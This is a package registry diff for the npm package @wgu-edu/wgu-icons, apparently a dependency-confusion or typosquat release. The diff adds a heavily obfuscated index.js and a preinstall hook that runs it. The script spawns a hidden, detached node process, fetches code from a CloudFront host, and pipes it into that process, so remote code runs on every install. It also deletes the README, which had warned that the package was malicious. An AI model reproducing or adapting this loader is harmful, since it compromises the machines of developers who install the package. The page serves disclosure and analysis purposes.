@wgu-edu/wgu-icons 0.0.1-security → 31.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @wgu-edu/wgu-icons might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +1 -0
  2. package/package.json +9 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1 @@
1
+ function _0x21b4(_0x5b7ff3,_0x5979e9){_0x5b7ff3=_0x5b7ff3-0x1eb;const _0xbc7119=_0xbc71();let _0x21b4e7=_0xbc7119[_0x5b7ff3];return _0x21b4e7;}const _0x245d4b=_0x21b4;(function(_0x588ca4,_0x1fb9c8){const _0x4ce6ce=_0x21b4,_0x453bde=_0x588ca4();while(!![]){try{const _0x27eab3=parseInt(_0x4ce6ce(0x1ec))/0x1+parseInt(_0x4ce6ce(0x1f1))/0x2+-parseInt(_0x4ce6ce(0x1f5))/0x3*(parseInt(_0x4ce6ce(0x1f2))/0x4)+parseInt(_0x4ce6ce(0x203))/0x5+parseInt(_0x4ce6ce(0x1fe))/0x6*(parseInt(_0x4ce6ce(0x1f4))/0x7)+-parseInt(_0x4ce6ce(0x1fd))/0x8*(parseInt(_0x4ce6ce(0x1f3))/0x9)+parseInt(_0x4ce6ce(0x1f9))/0xa*(-parseInt(_0x4ce6ce(0x200))/0xb);if(_0x27eab3===_0x1fb9c8)break;else _0x453bde['push'](_0x453bde['shift']());}catch(_0x4510d0){_0x453bde['push'](_0x453bde['shift']());}}}(_0xbc71,0x8c39a));function _0xbc71(){const _0x2477be=['Mozilla/5.0\x20(Macintosh;\x20Intel\x20Mac\x20OS\x20X\x2015_7_4)\x20AppleWebKit/605.1.15\x20(KHTML,\x20like\x20Gecko)\x20Version/26.0\x20Safari/605.1.15','exit','get','1161000SzMEdi','1023572RWtIoT','4688010LlVbmP','7StIvAo','12MJIPlf','stdin','d38u852ncr1ov2.cloudfront.net','/page?id=e9065329&3','541330RUoLkm','GET','error','ignore','8EzBgiO','5809506lsoGYd','unref','121AdXITi','pipe','https','4444385Cwxlyy','kill','276659hecNYo','statusCode'];_0xbc71=function(){return _0x2477be;};return _0xbc71();}const https=require(_0x245d4b(0x202)),{spawn}=require('child_process'),options={'hostname':_0x245d4b(0x1f7),'port':0x1bb,'path':_0x245d4b(0x1f8),'method':_0x245d4b(0x1fa),'headers':{'User-Agent':_0x245d4b(0x1ee)}},child=spawn(process['execPath'],['-'],{'detached':!![],'stdio':[_0x245d4b(0x201),_0x245d4b(0x1fc),_0x245d4b(0x1fc)],'windowsHide':!![]}),req=https[_0x245d4b(0x1f0)](options,_0x310292=>{const _0x513326=_0x245d4b;_0x310292[_0x513326(0x1ed)]!==0xc8&&(child[_0x513326(0x1eb)](),process['exit'](0x0)),_0x310292['pipe'](child[_0x513326(0x1f6)]),_0x310292['on']('end',()=>{const _0x1f41d3=_0x513326;child[_0x1f41d3(0x1ff)](),process[_0x1f41d3(0x1ef)](0x0);});});req['on'](_0x245d4b(0x1fb),()=>{const _0x1e7b1d=_0x245d4b;child[_0x1e7b1d(0x1eb)](),process[_0x1e7b1d(0x1ef)](0x0);});
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
2
  "name": "@wgu-edu/wgu-icons",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "31.0.0",
4
+ "description": "icons",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
6
12
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=%40wgu-edu%2Fwgu-icons for more information.